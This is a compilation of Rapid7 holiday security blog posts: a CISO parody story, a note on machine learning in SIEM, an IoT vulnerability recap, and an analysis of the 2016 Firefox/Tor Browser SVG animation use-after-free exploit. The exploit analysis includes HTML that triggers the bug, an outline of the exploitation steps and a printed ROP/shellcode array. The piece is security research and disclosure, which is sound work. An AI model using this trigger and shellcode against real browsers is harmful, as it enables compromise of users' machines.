7. Comments to the National Highway Traffic Safety Administration (NHTSA), Nov. 30: NHTSA asked for comments on its voluntary best practices for vehicle cybersecurity. Rapid7's comments recommended that the best practices prioritize security updating, encourage automakers to be transparent about cybersecurity features, and tie vulnerability disclosure and reporting policies to standards that facilitate positive interaction between researchers and vendors. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-nhtsa-cybersecurity-best-practices-for-modern-v…

2017 is shaping up to be an exciting year for cybersecurity policy. The past year made cybersecurity issues even more mainstream, and comments on proposed rules laid a lot of intellectual groundwork for helpful changes that can bolster security and safety. We are looking forward to keeping up the drumbeat for the security community next year. Happy Holidays, and best wishes for a good 2017 to you!

12 Days of HaXmas: A HaxMas Carol

(A Story by Rapid7 Labs)

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Happy Holi-data from Rapid7 Labs! It's been a big year for the Rapid7 Labs team. Our nigh 200-node-strong Heisenberg Cloud honeypot network has enabled us to bring posts and reports such as The Attacker's Dictionary, Cross-Cloud Adversary Analytics, and Mirai botnet tracking to the community, while Project Sonar fueled deep dives into National Exposure as well as ClamAV, fuel tanks and tasty, tasty EXTRABACON.

Our final gift of the year is the greatest gift of all: DATA! We've sanitized an extract of our November 2016 cowrie honeypot data from Heisenberg Cloud. While not the complete data set, it should be good for hours of fun over the holiday break. You can e-mail research [at] rapid7 [dot] com if you have any questions, or leave a note here in the comments. While you're waiting for that to download, please enjoy our little Haxmas tale…

Once upon a Haxmas eve…

CISO Scrooge sat sullen in his office. His demeanor was sour as he reviewed the day's news reports and sifted through his inbox, but his study was soon interrupted by a cheery minion's “Merry HaXmas, CISO!”

CISO Scrooge replied, “Bah! Humbug!”

The minion was taken aback. “HaXmas a humbug, CISO?! You surely don't mean it!”

“I do, indeed…” grumbled Scrooge. “What is there to be merry about? Every day attackers are compromising sites, stealing credentials and bypassing defenses. It's almost impossible to keep up. What's more, the business units and app teams here don't seem to care a bit about security. So, I say it again: ‘Merry HaXmas?' HUMBUG!”

Scrooge's minion knew better than to argue and quickly fled to the comforting glow of the pew-pew maps in the security operations center.

As CISO Scrooge returned to his RSS feeds, his office lights dimmed and a message popped up on his laptop, accompanied by a disturbing “clank” noise (very disturbing indeed, since he had the volume completely muted). No matter how many times he dismissed the popup it returned, clanking all the louder. He finally relented and read the message:

“Scrooge, it is required of every CISO that the defender spirit within them should stand firm with resolve in the face of their adversaries. Your spirit is weary and your minions are discouraged. If this continues, all your security plans will be for naught and attackers will run rampant through your defenses. All will be lost.”

Scrooge barely finished uttering, “Hrmph. Nothing but a resourceful security vendor with a crafty marketing message. My ad blocker must be misconfigured and that bulb must have burned out.”

“I AM NO MISCONFIGURATION!” appeared in the message stream, followed by, “Today, you will be visited by three cyber-spirits. Expect their arrivals on the top of each hour. This is your only chance to escape your fate.” Then the popup disappeared and the office lighting returned to normal. Scrooge went back to his briefing and tried to put the whole thing out of his mind.

The Ghost of HaXmas Past

CISO Scrooge had long finished sifting through news and had moved on to reviewing the first draft of their PCI DSS ROC[i]. His eyes grew heavy as he combed through the tome, until he was startled by a bright green light and the appearance of a slender man in a tan plaid 1970's business suit holding an IBM 3270 keyboard.

“Are you the cyber-spirit, sir, whose coming was foretold to me?” asked Scrooge.

“I am!” replied the spirit. “I am the Ghost of Haxmas Past! Come, walk with me!”

As Scrooge stood up, they were seemingly transported to a room full of mainframe computers with workers staring drone-like into green-screen terminals. “Now, this was security, spirit!” exclaimed Scrooge. “No internet… no modems… granular RACF[ii] access control…” (Scrooge was beaming almost as bright as the spirit!)

“So you had been successful securing your data from attackers?” asked the spirit.

“Well, yes, but this is when we had control! We had the power to give or deny anyone access to critical resources with a mere series of arcane commands.”

As soon as he said this, CISO Scrooge noticed the spirit moving away and motioning him to follow. When he caught up, the scene changed to a cubicle-lined floor filled with desktop PCs. “What about now? Were these systems secure?” inquired the spirit.

“Well, yes. It wasn't as easy as it was with the mainframe, but as our business tools changed and we started interacting with clients and suppliers on the internet, we found solutions that helped us protect our systems and networks and give us visibility into the new attacks that were emerging,” remarked CISO Scrooge. “It wasn't easy. In fact, it was much harder than the mainframe, but the business was thriving: growing, diversifying and moving into new markets. If we had stayed in a mainframe mindset we'd have gone out of business.”

The spirit replied, “So, as the business evolved, so did the security challenges, but you had resources to protect your data?”

“Well, yes. But these were just PCs. No laptops or mobile phones. We still had control!” noted Scrooge.

“That may be,” noted the spirit, “but if we continued our journey, would this not be the pattern? Technology and business practices change, but there have always been solutions to security problems coming at the same pace?”

CISO Scrooge had to admit that, as he looked back in his mind, there had always been ways to identify and mitigate threats as they emerged. They may not have always been 100% successful, but the benefits of the “new” to the business were far more substantial than the possible issues that came with it.

The Ghost of Haxmas Present

As CISO Scrooge pondered the spirit's words, he realized he was back at his desk, his screen having locked due to the required inactivity timeout. He gruffed a bit (he couldn't understand the 15-minute timeout when at your desk, as much as you can't) and fumbled three attempts at his overly complex password to unlock the screen before he was logged back in. His PCI DSS ROC was minimized and his browser was on a MeTube video (despite the site being blocked on the proxy server). He knew he had no choice but to click “play”. As he did, it seemed to be a live video of the Mooncents coffee shop down the street, buzzing with activity. He was seamlessly transported from remote viewer to being right in the shop, next to a young woman in bespoke, authentic, urban attire, sipping a double ristretto venti half-soy nonfat decaf organic chocolate brownie iced vanilla double-shot gingerbread frappuccino. Amongst the patrons were people on laptops, tablets and phones, many of them conducting business for CISO's company.

“Dude. I am the spirit of Haxmas Present”, she said, softly, as her gaze fixated upon a shadowy figure in the corner. CISO Scrooge turned his own gaze in that direction and noticed a hoodie-clad figure with a sticker-laden laptop. Next to the laptop was a device that looked like a wireless access point, and Scrooge could just barely hear the figure chuckling to himself as his fingers danced across the keyboard.

“Is that person doing what I think he's doing?” Scrooge asked the spirit.

“Indeed,” she replied. “He's set up a fake Mooncents access point and is intercepting all the comms of everyone connected to it.”

Scrooge's eyes got wide as he exclaimed, “This is what I mean! These people are just like sheep being led to the shearer. They have no idea what's happening to them! It's too easy for attackers to do whatever they want!”

As he paused for a breath, the spirit gestured to a woman who had just sat down in the corner and opened her laptop, prompting Scrooge to go look at her screen. The woman did work at CISO's company and she was in Mooncents on her company device, but — much to the surprise of Scrooge — as soon as she entered her credentials, she immediately fired up the VPN Scrooge's team had set up, ensuring that her communications would not be spied upon. The woman never once left her laptop alone and seemed to be very aware of what she needed to do to stay as safe as possible.

“Do you see what is happening?” asked the spirit. “Where and how people work today are not as fixed as they were in the past. You have evolved your corporate defenses to the point that attackers need to go to lengths like this, or trick users through phishing, to get what they desire.”

“Technology I can secure. But how do I secure people?!” sighed Scrooge.

“Did not this woman do what she needed to keep her and your company's data safe?” asked the spirit.

“Well, yes. But it's so much more work!” noted Scrooge. “I can't install security on users; I have to make them aware of the threats and then make it as easy as possible for them to work securely no matter where they are!”[iii]

As soon as he said this, he realized that this was just the next stage in the evolution of the defenses he and his team had been putting into place. The business-growing power inherent in this new mobility and the solid capabilities of his existing defenses forced attackers to behave differently, and he understood that he and his team probably needed to as well.

The spirit gave a wry, ironic grin at seeing Scrooge's internal revelation. She handed him an infographic titled “Ignorance & Want” that showcased why it was important to make sure employees were well-informed, to stay in tune with how users want to work, and to make sure his company's IT offerings were as easy to use and functional as all the shiny “cloud” apps.

The Ghost of Haxmas Future

As Scrooge took hold of the infographic, the world around him changed. A dark dystopian scene faded into view. Buildings were in shambles and people were moving in zombie-like fashion in the streets. A third, cloaked spirit appeared next to him and pointed towards a disheveled figure hulking over a fire in a barrel. An “eyes” emoji appeared on the OLED screen where the spirit's face should have been. CISO Scrooge didn't even need to move closer to see that it was a future him, struggling to keep warm to survive in this horrible wasteland.

“Isn't this a bit much?” inquired Scrooge. The spirit shrugged and a “whatever” emoji appeared on the screen.

Scrooge continued, “I think I've got the message. Business processes will keep evolving and moving faster and will never be tethered and isolated again. I need to stay positive and constantly evolve — relying on psychology and education as well as technology — to address the new methods attackers will be adopting. If I don't, it's ‘game over'.”

The spirit's screen flashed a “thumbs up” emoji and CISO Scrooge found himself back at his desk, infographic strangely still in hand, with his Haxmas spirit fully renewed. He vowed to keep Haxmas all the year through from now on.

[i] Payment Card Industry Data Security Standard Report on Compliance
[ii] http://www-03.ibm.com/systems/z/os/zos/features/racf/
[iii] Scrooge eventually also realized he could make use of modern tools such as InsightIDR to combine security and threat event data with user behavior analysis to handle the cases where attackers do successfully breach users.

12 Days of HaXmas: A Fireside Foray into a Firefox Fracas

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Towards the end of November, the Tor community was shaken up by the revelation of a previously unknown vulnerability being actively exploited against pedo^H^H^H^H Tor Browser users. Some further drama unfolded regarding who the source of the exploit may be, and I received questions from several reporters who wanted every single detail I could give them. While I did not participate in commenting at the time, I'll say everything I will ever say about it now:

Yes, I'm aware of a very similar exploit which targeted Firefox
No, I didn't write it

Largely lost among all the noise are the nuances of the vulnerability and the exploit itself, which I know the author put his heart and soul into. If anonymous entrants are ever retroactively awarded Pwnies, I'd like to put his unsaid name into the hat. In this part of the 12 Days of HaXmas, I want to offer a high-level overview of some of the more interesting parts of both the vulnerability, which in my opinion doesn't fit cleanly into any classic category, and the exploit. I'm not going to dive into all of the gory details for a couple of reasons. First, timing: had this been leaked earlier in the year, I might have been able to do the analysis part some justice. Second, while verbose technical expositions certainly have their place, a blog is not the right spot. The content might take another 12 days to cover, and for those seeking to learn from it, I feel your own analysis of the exploit coupled with lots of dirty work in a debugger would be your best option. In that case, hopefully this can offer you some direction along the way.

The Discovery

It would be remiss of me if I didn't begin by pointing out that no fuzzer was used in the discovery of this vulnerability. The only tools employed were the Woboq Code Browser (Woboq Code Browser — Explore C code on the web), WinDBG, a sharp mind, and exhaustive effort. The era of low-hanging fruit is largely over in my opinion. Don't be the gorilla, be the lemur, climb that tree.

The Vulnerability

In the following snippet from nsSMILTimeContainer.cpp, the pointer p is initialized to the beginning of the mMilestoneEntries array.

void nsSMILTimeContainer::NotifyTimeChange()
{
  // Called when the container time is changed with respect to the document
  // time. When this happens time dependencies in other time containers need to
  // re-resolve their times because begin and end times are stored in container
  // time.
  //
  // To get the list of timed elements with dependencies we simply re-use the
  // milestone elements. This is because any timed element with dependents and
  // with significant transitions yet to fire should have their next milestone
  // registered. Other timed elements don't matter.
  const MilestoneEntry* p = mMilestoneEntries.Elements();
#if DEBUG
  uint32_t queueLength = mMilestoneEntries.Length();
#endif
  while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) {
    mozilla::dom::SVGAnimationElement* elem = p->mTimebase.get();
    elem->TimedElement().HandleContainerTimeChange();
    MOZ_ASSERT(queueLength == mMilestoneEntries.Length(),
               "Call to HandleContainerTimeChange resulted in a change to the "
               "queue of milestones");
    ++p;
  }
}

Now, consider the following two examples:

Exhibit One

<html>
  <head>
    <title> Exhibit One </title>
  </head>
  <body>
    <svg id='foo'>
      <animate id='A' begin='1s' end='10s' />
      <animate begin='A.end + 5s' dur='15s' />
    </svg>
  </body>
</html>

Exhibit Two

<html>
  <head>
    <title> Exhibit Two </title>
  </head>
  <body>
    <svg id='foo'>
      <animate id='A' begin='1s' end='10s' />
    </svg>
    <svg id='bar'>
      <animate begin='A.end + 5s' dur='15s' />
    </svg>
  </body>
</html>

In these examples, for each <svg> element that uses <animate>, an nsSMILTimeContainer object is assigned to it in order to perform time bookkeeping for the animations (<animateTransform> or <animateMotion> will also have the same behavior). The epoch of each container is the time since the creation of the <svg> element it is assigned to, relative to the creation of the page. The nsSMILTimeContainer organizes each singular event in an animation with an entry for each in the mMilestoneEntries member array. See: nsSMILTimeContainer.h — DXR

In Exhibit One, the mMilestoneEntries array will contain four entries: one each for the beginning and ending of 'A', in addition to another two, one being relative to A's completion (A.end + 5s), and the other demarcating the end of the animation, in this case 30 seconds (A.end + 5s + 15s).

In Exhibit Two we see two independent <svg> elements. In this example, two separate nsSMILTimeContainer objects will be created, each of course having its own mMilestoneEntries array.

The exploit makes a single call to the function pauseAnimations(), which in turn triggers entry into the NotifyTimeChange() method. nsSMILTimeContainer::NotifyTimeChange() proceeds to iterate through all entries in the mMilestoneEntries array, retrieving each individual entry's nsSMILTimedElement object, after which it calls the object's HandleContainerTimeChange() method. After some time, this method will end up making a call to the NotifyChangedInterval() method of the nsSMILTimedElement object. In NotifyChangedInterval(), HandleChangedInterval() will be entered if the animation being processed has a milestone relative to another animation. In Exhibit Two, bar's beginning is relative to the element A belonging to foo, so HandleChangedInterval() will be called.

Within HandleChangedInterval(), a call to nsSMILTimeValueSpec::HandleChangedInstanceTime() will inevitably be made. This method determines if the current animation element and the one it has a dependency on are contained within the same nsSMILTimeContainer object. If so, as is the case with Exhibit One, the pauseAnimations() function basically lives up to its name and pauses them. In Exhibit Two, the animations do not share the same nsSMILTimeContainer object, so additional bookkeeping is required in order to maintain synchronization. This occurs, with subsequent calls to nsSMILTimedElement::UpdateInstanceTime() and nsSMILTimedElement::UpdateCurrentInterval() being made, and nothing too interesting is to be seen, though we will be revisiting it very shortly.

Deeper down the rabbit hole ...
What about the case of three or more animation elements with relative dependencies? Looking at the exploit, we see four animations split unequally among two containers. We can modify Exhibit Two using details gleaned from the exploit to arrive at the following example.

Exhibit Three

<html>
  <head>
    <title> Exhibit Three </title>
  </head>
  <body>
    <svg id='foo'>
      <animate id='A' begin='1s' end='5s' />
      <animate id='B' begin='10s' end='C.end' dur='5s' />
    </svg>
    <svg id='bar'>
      <animate id='C' begin='0s' end='A.end' />
    </svg>
    <script>
      var foo = document.getElementById('foo');
      foo.pauseAnimations();
    </script>
  </body>
</html>

In this example, C's ending is relative to A's end, so we end up in nsSMILTimedElement::UpdateCurrentInterval() again, except that a different branch is followed based on the example's milestones:

if (mElementState == STATE_ACTIVE) {
  // The interval is active so we can't just delete it, instead trim it so
  // that begin==end.
  if (!mCurrentInterval->End()->SameTimeAndBase(*mCurrentInterval->Begin())) {
    mCurrentInterval->SetEnd(*mCurrentInterval->Begin());
    NotifyChangedInterval(mCurrentInterval, false, true);
  }
  // The transition to the postactive state will take place on the next
  // sample (along with firing end events, clearing intervals etc.)
  RegisterMilestone();

NotifyChangedInterval() is called to resolve any milestones relative to other animations for C. Within foo, B has milestones relative to C in bar. This results in a recursive branch along the same code path which ultimately hits UpdateCurrentInterval(), which in turn sets the state of the nsSMILTimedElement. mElementState can be one of four possible values:

STATE_STARTUP
STATE_WAITING
STATE_ACTIVE
STATE_POSTACTIVE

each of which describes its own meaning perfectly. In Exhibit Three, B's beginning is set to occur after its ending is set (C.end == A.end == 5s). Since it will never start, the code marks it as STATE_POSTACTIVE. This results in the following code within the UpdateCurrentInterval() method creating a new interval and setting it as current:

if (GetNextInterval(GetPreviousInterval(), mCurrentInterval,
                    beginTime, updatedInterval)) {
  if (mElementState == STATE_POSTACTIVE) {
    MOZ_ASSERT(!mCurrentInterval,
               "In postactive state but the interval has been set");
    mCurrentInterval = new nsSMILInterval(updatedInterval);
    mElementState = STATE_WAITING;
    NotifyNewInterval();
  }

With this occurring, UpdateCurrentInterval() now makes a call to the RegisterMilestone() method. This was not the case in Exhibit Two. With a new interval having been created, the method will add a new entry to the mMilestoneEntries array of foo's nsSMILTimeContainer object, resulting in the array being freed and reallocated elsewhere, leaving the pointer p from nsSMILTimeContainer::NotifyTimeChange() referencing invalid memory.

Exploitation Overview

Just because the pointer p in NotifyTimeChange() can be forced to point to freed memory doesn't mean it's all over. Firefox overwrites freed memory with 0x5a5a5a5a, which effectively mitigates a lot of classic UaF scenarios. Secondly, there is no way to allocate memory in the freed region after the milestone array is relocated. Given these conditions, it's becoming clear that the vulnerability cannot be exploited like a classic use-after-free bug. If you forced me to categorize it and come up with a new buzzword, as people are so apt to do in this industry, I might call it a dangling index, or an iterator run-off.
Regardless of silly names, the exploit utilizes some artful trickery to overcome the hurdles inherent in the vulnerability. As I mentioned at the outset, for the sake of brevity I'm going to be glossing over a lot of the details with regard to heap determinism (the terms "heap grooming" and "heap massaging" irritate me more than the word "moist").

In the first step, the exploit defragments the heap by spraying 0x80-byte blocks of ArrayBuffers, and another 0x80 milestone arrays. Each of the milestone arrays is filled to capacity, and then one additional element is added to each. This causes the arrays to be reallocated elsewhere, leaving 0x80 holes. After filling these holes with vulnerable milestone arrays, assuming the last element of the array is the one that triggers the vulnerability, there is now a high probability that the next iteration of the NotifyTimeChange() loop will point within one of the 0x80 ArrayBuffers that were allocated first. It is important that the last element be the one to trigger the bug, as otherwise the memory would be freed and overwritten before an attacker could take advantage of it.

The next obstacle in the process is bypassing the object reference count which, under normal circumstances, would cause the loop to exit. Even if this were a full technical exposition, I'd leave this part as an exercise to the reader, because of reasons. I invite you to figure it out on your own, because it's both quite clever and critical to the success of the exploit. Those pesky reasons though. Seasoned exploitation engineers will see it quickly, and astute students will have truly learned when they unravel the knot. (I'd like to think that this is a good hint, but the only certainty is that it comes up on my 3 AM debugging session playlist a lot.)

In any case, after the exploit does its thing, the exit condition of the loop

while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length())

will never be reached, and instead the loop will continue to iterate infinitely. While this is great news, it also means that an attacker is unable to continue executing code. The solution to this is one of the more brilliant aspects of this exploit, that being the use of a Javascript worker thread:

var worker = new Worker('cssbanner.js');

With the worker thread, Javascript can continue being executed while the infinite loop within the main thread keeps spinning. In fact, it's used to keep tabs on a lot of magical heap manipulation happening in the background, and to selectively exit the loop when need be. From here, the exploit leverages a series of heap corruptions into an r/w primitive, and bypasses ASLR by obtaining the base address of xul.dll from said corruptions by parsing the file's DOS header in memory. This, along with resolving imports, is the main purpose of the PE(b,a) function in the leaked exploit.

With ASLR defeated, all that lies ahead is defeating Data Execution Prevention, as the Tor browser doesn't feature any sort of sandbox technology. The exploit handles this beautifully by implementing an automatic ROP chain generation function, which can locate the addresses of required gadgets amongst multiple versions of Firefox/Tor browser.
After constructing the chain, the following shellcode is appended (I've converted all addresses to base 16 for readability and added comments):

ropChain[i++] = 0xc4819090;        // add esp, 800h
ropChain[i++] = 0x0800;
ropChain[i++] = 0x5050c031;        // xor eax, eax ; push eax ; push eax
ropChain[i++] = 0x5b21eb50;        // push eax ; jmp eip+0x23 ; pop ebx
ropChain[i++] = 0xb8505053;        // push ebx ; push eax ; push eax
ropChain[i++] = CreateThread;      // mov eax, kernel32!CreateThread
ropChain[i++] = 0xb890d0ff;        // call eax
ropChain[i++] = arrBase + 0x2040;  // mov eax, arrBase+0x2040
ropChain[i++] = 0x5f58208b;        // mov esp, dword ptr [eax] ; pop eax ; pop edi
ropChain[i++] = 0xbe905d58;        // pop eax ; pop ebp
ropChain[i++] = 0xffffff00;        // mov esi, 0xffffff00
ropChain[i++] = 0x000cc2c9;        // ret 0x0c
ropChain[i++] = 0xffffdae8;        // call eip+0x21
ropChain[i++] = 0x909090ff;        // placeholder for payload address

The shellcode basically allocates stack space and makes a call to CreateThread with the address of the final payload, which is obtained via the jmp eip+0x23 ; pop ebx line, as its argument. It next performs stack cleanup and exits the current infinite NotifyTimeChange() loop to ensure clean process continuation. At least, it's supposed to. Initial findings I've read from other researchers seem to indicate that it does not continue cleanly when used against the Tor browser. I need to investigate this myself at the first lull in the holiday festivities.

"I hope I managed to prove that exploiting buffer overflows should be an art"
-Solar Designer

That wraps this up for now. Check back for updates in the future as I continue analysis on it. If you have questions about anything, feel free to ask either here or find me on Twitter @iamwilliamwebb. Happy holidays!

References

Original leaked exploit: [tor-talk] Javascript exploit

12 Days of HaXmas: Rudolph the Machine Learning Reindeer

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Sam the snowman taught me everything I know about reindeer [disclaimer: not actually true], so it only seemed logical that we bring him back to explain the journey of machine learning. Wait, what? You don't see the correlation between reindeer and machine learning? Think about it: that movie had everything: Yukon Cornelius, the Bumble, and of course, Rudolph himself. And thus, in sticking with the theme of HaXmas 2016, this post is all about the gifts of early SIEM technology, “big data”, and a scientific process.

SIEM and statistical models – Rudolph doesn't get to play the reindeer games

Just as Rudolph had conformist Donner's gift of a fake black nose promising to cover his glowing monstrosity [and it truly was impressive to craft this perfect deception technology with hooves], information security had the gift of early SIEM technology promising to analyze every event against known bad activity to spot malware. The banking industry had just seen significant innovation in the use of statistical analysis [a sizable portion of what we now call “analytics”] for understanding the normal in both online banking and payment card activities. Tracking new actions and comparing them to what is typical for the individual takes a great deal of computing power, and early returns in replicating fraud prevention's success were not good. SIEM had a great deal working against it when everyone suddenly expected a solution designed solely for log centralization to easily start empowering more complex pattern recognition and anomaly detection.

After having witnessed, as consumers, the fraud alerts that can come from anomaly detection, executives started expecting the same from their team of SIEM analysts. Except there were problems: the events within an organization vary a great deal more than the login, transfer, and purchase activities of the banking world; the fraud detection technology was solely dedicated to monitoring events in other, larger systems; and SIEM couldn't handle both data aggregation and analyzing hundreds of different types of events against established norms. After all, my favorite lesson from data scientists is that “counting is hard”. Keeping track of the occurrence of every type of event for every individual takes a lot of computing power and understanding of each type of event. After attempting to define alerts for transfer size thresholds, port usage, and time-of-day logins, no one had anticipated that services like Skype using unpredictable ports and the most privileged users regularly logging in late to resolve issues would cause a bevy of false positives. This forced most incident response teams to banish advanced statistical analysis to the island of misfit toys, like an elf who wants to be a dentist.

“Big Data” – Yukon Cornelius rescues machine learning from the Island of Misfit Toys

There is probably no better support-group friend for the bizarre hero, Yukon Cornelius, than “big data” technologies. Just as everything from NoSQL databases, like Mongo, to map-reduce technologies, like Hadoop, was marketed as the solution to every conceivable challenge, Yukon proudly announced his heroism to the world.
Yukon carried a gun he never used, even when fighting the Bumble; likewise, “big data” technology is varied, and each kind needs to be weighed against less expensive options for each problem. When jumping into a solution technology-first, most teams attempting to harness “big data” technology came away with new hardware clusters and mixed results; insufficient data and security experts miscast as data experts still prevent returns on machine learning from happening today. However, with the right tools and the right training, data scientists and software engineers have used “big data” to rescue machine learning [or statistical analysis, for the old school among you] from its unfit-for-here status. Thanks to “big data”, all of the original goals of statistical analysis in SIEMs are now achievable. This may have led to hundreds of security software companies marketing themselves as “the machine learning silver bullet”, but you just have to decide when to use the gun and when to use the pickaxe. If you can cut through the hype to decide when the analytics are right and for which problems machine learning is valuable, you can be a reason that both Hermey, the dentist, and Rudolph, the HaXmas hero, reach their goals.

Visibility - only Santa Claus could get it from a glowing red nose

But just as Rudolph's red nose didn't make Santa's sleigh fly faster, machine learning is not a magic wand you wave at your SIEM to make eggnog pour out. That extra-foggy Christmas Eve couldn't have been foggy all over the globe [or it was more like the ridiculous Day After Tomorrow], but Santa knows how to defy physics to reach the entire planet in a single night, so we can give him the benefit of the doubt and assume he knew when and where he needed a glowing red ball to shine brighter than the world's best LED headlights. I know that I've held a pretty powerful Maglite in the fog and still couldn't see a thing, so I wouldn't be able to get around Mt. Washington armed with a glowing reindeer nose. Similarly, you can't just hand a machine learning toolkit to any security professional and expect them to start finding the patterns they should care about across those hundreds of data types mentioned above. It takes the right tools, an understanding of the data science process, and enough security domain expertise to apply machine learning to the attacker behaviors well hidden within our chaotically normal environments. Basic anomaly detection and the baselining of users and assets against their peers should be embedded in modern SIEM and EDR solutions to reveal important context and unusual behavior. It's the more focused problems and data sets that demand the kind of pattern recognition, within the characteristics of a website or PHP file, that only the deliberate development of machine learning algorithms can properly address.
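To make the baselining idea concrete, here is a minimal sketch of peer-group baselining using a simple z-score. This is my own illustration, not anything from a Rapid7 product; the login counts and the three-sigma threshold are hypothetical, and production baselining is considerably more sophisticated:

# A minimal sketch of peer-group baselining via z-scores. The login
# counts and the 3-sigma threshold are hypothetical examples.
from statistics import mean, stdev

# Daily login counts for one peer group (e.g., all engineers).
peer_logins = {"alice": 12, "bob": 9, "carol": 11, "dave": 10, "mallory": 48}

for user, count in peer_logins.items():
    # Baseline each user against the rest of the peer group.
    peers = [v for u, v in peer_logins.items() if u != user]
    mu, sigma = mean(peers), stdev(peers)
    z = (count - mu) / sigma if sigma else 0.0
    if abs(z) > 3:  # flag behavior far outside the peer baseline
        print(f"{user}: {count} logins (z-score {z:.1f}) is anomalous")

Real deployments baseline many event types at once, which is exactly where the computing power and "counting is hard" problems described above come in.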

12 Days of HaXmas: 2016 IoT Research Recap

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. As we close out the end of the year, I find it important to reflect on the IoT vulnerability research conducted during 2016 and what we learned from it. There were several exciting IoT vulnerability research projects conducted by Rapid7 employees in 2016, which covered everything from lighting automation solutions to medical devices. Through this research, we want to give the "gift" of more information about IoT security to the community. In the spirit of celebrating the holidays, let's recap and celebrate each of these projects and some of the more interesting findings.

Comcast XFINITY Home Security System

2016 opened with a research project on the Comcast XFINITY Home Security System, which was published in January 2016. Phil Bosco, a member of Rapid7's Global Services pen test team, targeted his XFINITY home security system for evaluation. During testing, Phil discovered that by creating a failure condition in the 2.4 GHz radio frequency band used by the Zigbee communication protocol, the Comcast XFINITY Home Security System would fail open, with the base station failing to recognize or alert on a communications failure with the component sensors. This interesting finding showed us that if communication to the system's sensors is lost, the system fails to recognize that lost communication. Additionally, this failure also prevented the system from properly alarming when a sensor detected a condition such as an open door or window. This vulnerability allowed anyone capable of interrupting the 2.4 GHz Zigbee communication between sensor and base station to effectively silence the system. Comcast has since fixed this issue.

Osram Sylvania Lightify Automated Lighting

Since automated lighting has become very popular, I decided to examine the OSRAM Sylvania LIGHTIFY automated lighting solution. This research project consisted of looking at both the Home and Pro (enterprise) versions, and it ended up revealing a total of nine issues: four in the Home version and five in the Pro. The Pro version had the most interesting of these results, which included persistent cross-site scripting (XSS) and weak default WPA2 pre-shared keys (PSKs). The XSS vulnerabilities we found had two entry points, with the most entertaining one being an out-of-band injection using the WiFi Service Set Identifier (SSID) to deliver the XSS attack into the Pro web management interface. This type of attack delivery method is explained in a Whiteboard Wednesday video I recorded.

Next, the finding that I would consider the most worrisome is the WPA PSK issue. Default passwords have been a scourge of IoT recently. Although in this case the default passwords are different across every Pro device produced, closer examination of the WPA PSKs revealed they were easily cracked. So how did this happen? Well, in this case the PSK was only eight characters long, which is considered very short for a PSK, and it only used lowercase hexadecimal characters (abcdef0123456789). This makes the number of combinations, or key space, small enough to brute force, allowing a malicious actor to capture an authentication handshake and brute force it offline in only a few hours.
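To put that key space in perspective, here is a quick back-of-the-envelope calculation of my own (not part of the original research); the guess rate is a hypothetical figure for offline WPA2 cracking, and real rates vary widely by hardware:

# Rough key-space math for an 8-character, lowercase-hex WPA2 PSK.
# The 200,000 guesses/second rate is a hypothetical offline cracking
# figure; actual rates depend heavily on the attacker's hardware.
alphabet = len("abcdef0123456789")   # 16 possible characters
length = 8
keyspace = alphabet ** length        # 16^8 = 4,294,967,296 keys

guesses_per_second = 200_000
hours = keyspace / guesses_per_second / 3600
print(f"{keyspace:,} keys, exhausted in at most {hours:.1f} hours")

A long random PSK drawn from the full printable character set would put the same attack far beyond practical reach.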
Bluetooth Low Energy (BLE) Trackers

Ever get curious about those little Bluetooth Low Energy (BLE) tracker dongles you can hang on your key chain that help you locate your keys if you misplace them? So did I, but my interest went a little further than finding my lost keys. I was interested in how they worked and what, if any, security issues could be associated with their use or misuse. I purchased several different brands and started testing their ecosystems. Yes, ecosystems: that is, all of the services that make an IoT solution function, which often include the hardware, mobile applications, and cloud APIs.

One of the most fascinating aspects of these devices is the crowd GPS concept. How does that work? Let's say you attach one of the devices to your bicycle and it gets stolen. Every time that bicycle passes within close proximity to another user of that specific product, their cell phone will detect your dongle on the bicycle and send the GPS location to the cloud, allowing you to identify its location. Kind of neat, and I expect it works well in an area with a good saturation of users, but if you live in a rural area there's less chance of it working as well.

During this project we identified several interesting vulnerabilities related to the tracking identifiers and GPS tracking. For example, we found that the devices' tracking IDs were easily identified and in a couple of cases were directly related to the BLE physical address. Combining that with some cloud API vulnerabilities, we were able to track a user using the GPS of their device. Additionally, in a couple of cases we were able to poison the GPS data for other devices. With weak BLE pairing, we were also able to gain access to a couple of the devices, rename them, and set off their location alarms, which drained the devices' small batteries.

Animas OneTouch Ping Insulin Pump

Rapid7's Jay Radcliffe, a member of the Global Services team and a security researcher at Rapid7, found several fascinating vulnerabilities while testing the Animas OneTouch Ping insulin pump. Jay is renowned for his medical device research, which has a personal aspect to it, as he is diabetic. In the case of the Animas OneTouch, Jay found and reported three vulnerabilities: cleartext communication, weak pairing between remote and pump, and a replay attack vulnerability. During this research project it was determined that these vulnerabilities could potentially be used to dispense insulin remotely, which could impact the safety and health of the user. Jay worked closely with the manufacturer to help create effective mitigations for these vulnerabilities, which can be used to reduce or eliminate the risk. Throughout the project, there was positive collaboration between Jay, Rapid7, and Johnson & Johnson, and patients were notified prior to disclosure.

Conclusion

Stepping back and taking a holistic look at all of the vulnerabilities found during these research projects, we notice a pattern of common issues, including:

Lack of communication encryption
Poor device pairing
Confidential data (such as passwords) stored within mobile applications
Vulnerability to replay attacks
Weak default passwords
Cloud API and device management web services vulnerable to common web vulnerabilities

